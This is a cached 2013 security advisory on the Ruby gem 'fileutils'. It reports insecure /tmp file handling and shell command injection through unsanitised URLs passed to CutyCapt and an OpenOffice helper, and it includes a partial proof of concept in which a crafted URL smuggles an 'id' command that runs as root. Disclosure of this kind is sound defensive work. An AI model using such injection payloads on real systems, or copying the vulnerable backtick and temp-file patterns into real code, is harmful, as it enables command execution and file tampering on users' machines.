This is Google's cache of http://vapid.dhs.org/research/file_utils_ruby_gem.txt. It is a snapshot of the page as it appeared on Apr 19, 2013 12:24:49 GMT. The current page could have changed in the meantime. Learn more
Tip: To quickly find your search term on this page, press Ctrl+F or ⌘-F (Mac) and use the find bar.

Text-only version
 
Possible remote command execution and insecure file handling in /tmp.

http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types".

Handles files insecurely in /tmp, a directory is created for that file extension
say 'zip' and files are maniplated there.  This directory can be hijacked and the contents manipulated by a malicious user.

in ./lib/file_utils.rb

 15     def zip (target, *sources)
 16         targetdir = "#{FileUtils::Config.tmp_dir}/zip"
 17         id = 1
 18         while File.exists?(targetdir)
 19             targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
 20             id += 1
 21         end
 22         FileUtils.mkdir(targetdir)

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

  5         def self.tmp_dir
  6             @tmp_dir ||= '/tmp'
  7         end


* Remote command execution:



From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution.  If a URL contains shell characters say a ';' followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like:

* need to test URL encoding not sure if this is valid.

http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz

  7     def capture (url, target)
  8         command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
  9         `#{command}`
 10     end

partial PoC if client is tricked into using malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt  --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf`
xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0> 

root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo 
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo 
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# 


Michael Scherer of Redhat.com found other issues during a discussion about the above issues I found:

In fact, there is the same similar problem
in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command}
#{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb ( a quick command line to type ruby snippet,
and yes, using funky chars result in funky results.

There is another issue in
# Generates a temp filepath for the given extension
def temp (extension)
	path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
id = 1
while File.exists?(path)
	path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
	id += 1
end

since someone could just create the file at the last moment, and make a
link so the script would overwrite an arbitrary file.